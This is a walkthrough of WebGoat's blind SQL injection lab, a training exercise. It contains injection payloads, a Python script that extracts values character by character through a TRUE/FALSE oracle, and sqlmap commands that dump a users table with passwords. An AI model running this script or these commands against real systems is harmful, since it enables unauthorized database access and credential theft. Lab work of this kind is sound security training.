WebGoat SQL injection advanced 5

PVXs
Sep 6, 2020

This lesson asks us to work out how the login/register form is vulnerable to blind SQLi and to exploit the vulnerability in order to log in as Tom.

So I started with some straightforward tests on the ‘username’ text field of the login form:

tom' AND '1'='1
Tom' AND '1'='1
admin' AND '1'='1
...

But none of these were successful.

Since there is also a registration form, I then created a user and tried to log in with it.

As both the registration and the login worked fine with the new user, I can assume that the form values I sent for these two operations both ended up in valid SQL queries.

So what happens if I send them again with an SQLi test attached?

newuser' AND '1'='1

From this response I understand that the app checks whether the username already exists by running a query built from our input. This statement is therefore a valid TRUE statement: the username already exists and '1'='1' holds, so the app tells us to pick a different username.

newuser' and '1'='2

Hence this is a valid FALSE statement: the username exists, but '1'='2' does not hold, so the app treats the name as available.

A reliable TRUE/FALSE oracle like this is all we need to ask the database for any of its data, one character at a time, as long as the db user is allowed to read it.

In lesson #4 we were given a hint for this problem:

AND substring(database_version(),1,1) = '2

By varying the position argument of substring() and the literal value we can loop over every position and see which character matches. Each position can be brute-forced with Burp Intruder: mark the literal (the §2§ in the payload above) as the payload position, run a sniper attack with a list such as https://github.com/xmendez/wfuzz/blob/master/wordlist/stress/alphanum_case_extra.txt, and look for the one request whose response indicates a TRUE statement. Then move on to the next position and repeat.

The database version is 2.5.0 on my WebGoat install.
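The same position-by-position loop can be scripted instead of clicking through Burp Intruder. The following is an added example, not code from the original post or from WebGoat: it builds the lesson's payload shape (known username, then AND substring(expr,pos,1)='c', with the application supplying the closing quote), scans a character set at each position, and stops when no character matches. The HTTP oracle is a thin wrapper you point at the registration request you captured in Burp; the URL, HTTP method, extra form fields and cookie below are assumptions and must be copied from your own capture. A fake oracle is included so the extraction logic can be exercised offline against a constructed version string.

```python
"""Boolean-based blind SQLi extraction, character by character."""
import re
import string
import urllib.parse
import urllib.request
from typing import Callable

# The registration form answers a TRUE condition with this text (from the lesson).
TRUE_MARKER = "please try to register with a different username"

# Characters tried at each position; the single quote is left out so the
# payload never breaks its own string literal.
CHARSET = string.digits + string.ascii_letters + "._- "


def build_payload(known_user: str, expr: str, pos: int, ch: str) -> str:
    """Lesson-style payload, e.g. newuser' AND substring(database_version(),1,1)='2
    The application appends the closing quote, so we do not."""
    return f"{known_user}' AND substring({expr},{pos},1)='{ch}"


def extract(oracle: Callable[[str], bool], known_user: str, expr: str,
            max_len: int = 64) -> str:
    """Recover the value of a SQL expression one character at a time.
    `oracle` returns True when the injected condition evaluated TRUE."""
    result = ""
    for pos in range(1, max_len + 1):
        for ch in CHARSET:
            if oracle(build_payload(known_user, expr, pos, ch)):
                result += ch
                break
        else:
            # No character matched: either end of the value or a char outside CHARSET.
            break
    return result


def make_http_oracle(url: str, cookie: str) -> Callable[[str], bool]:
    """Oracle against the live registration endpoint.
    ASSUMPTIONS: PUT method, field names other than username_reg, and the
    session cookie; copy all of these from the request captured in Burp."""
    def oracle(payload: str) -> bool:
        form = {"username_reg": payload, "email_reg": "a@b.c",
                "password_reg": "x", "confirm_password_reg": "x"}
        body = urllib.parse.urlencode(form).encode()
        req = urllib.request.Request(url, data=body, method="PUT")
        req.add_header("Cookie", cookie)
        req.add_header("Content-Type", "application/x-www-form-urlencoded")
        with urllib.request.urlopen(req) as resp:
            return TRUE_MARKER in resp.read().decode(errors="replace")
    return oracle


def make_fake_oracle(db_version: str, existing_user: str) -> Callable[[str], bool]:
    """Constructed test double standing in for the app + HSQLDB.
    It understands only the payload shape produced by build_payload."""
    pattern = re.compile(r"^(.*)' AND substring\((.*),(\d+),1\)='(.)$")

    def oracle(payload: str) -> bool:
        m = pattern.match(payload)
        if not m:
            return False
        user, expr, pos, ch = m.group(1), m.group(2), int(m.group(3)), m.group(4)
        if user != existing_user or expr != "database_version()":
            return False  # unknown user or expression: nothing exists, FALSE
        return pos <= len(db_version) and db_version[pos - 1] == ch
    return oracle


if __name__ == "__main__":
    # Offline demonstration against the constructed oracle.
    fake = make_fake_oracle("2.5.0", "newuser")
    print(extract(fake, "newuser", "database_version()"))
    # Against a live WebGoat (all values assumed; take them from your Burp capture):
    # live = make_http_oracle("http://localhost:8080/WebGoat/SqlInjectionAdvanced/challenge",
    #                         "JSESSIONID=...")
    # print(extract(live, "newuser", "database_version()"))
```

Every position costs up to len(CHARSET) requests, which is exactly what the Intruder sniper attack does by hand; replacing the equality with a `>` comparison and a binary search over the character range cuts that to about seven requests per position if you need to dump larger values.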

I then wanted to automate the rest with sqlmap and see what I could get from the db.

The simplest way I know to give sqlmap a proper request is to:

  • submit the registration request from the browser and get the response for a TRUE statement
  • copy both from Burp
  • use the request as the input file and the TRUE response text as the --string parameter in sqlmap
sqlmap -r request.txt --string "please try to register with a different username" -p username_reg --threads 1
(Screenshot: sqlmap reports the username_reg parameter as vulnerable and identifies the DBMS as HSQLDB.)

Then we ask for the database used by our query:

sqlmap -r request.txt --string "please try to register with a different username" -p username_reg --threads 1 --dbms="HSQLDB" --current-db
(Screenshot: sqlmap reports the current DB as PUBLIC, using boolean-based blind SQLi.)

Let’s try to get the table names:

sqlmap -r request.txt --string "please try to register with a different username" -p username_reg --threads=10 --technique=B --dbms="HSQLDB" -D PUBLIC --tables --level=5 --risk=3

I would then start by looking at the CHALLENGE_USERS table:

sqlmap -r request.txt --string "please try to register with a different username" -p username_reg --threads=1 --technique=B --dbms="HSQLDB" -D PUBLIC -T CHALLENGE_USERS --columns --level=5 --risk=3
(Screenshot: sqlmap asks permission to brute-force the column names with its wordlist, followed by the result.)

And finally dump the table rows. This time I had to lower the number of threads because of the number of errors I was getting with 10 threads on my machine:

sqlmap -r request.txt --string "please try to register with a different username" -p username_reg --threads=1 --technique=B --dbms="HSQLDB" -D PUBLIC -T CHALLENGE_USERS -C userid,password --dump --level=5 --risk=3
(Screenshot: the dumped CHALLENGE_USERS table, including Tom's password.)

Now we have Tom's username and password and can log in on the lesson's login form.

This concludes WebGoat SQL injection advanced 5.

I hope you liked it

PVXs — https://twitter.com/pivixih
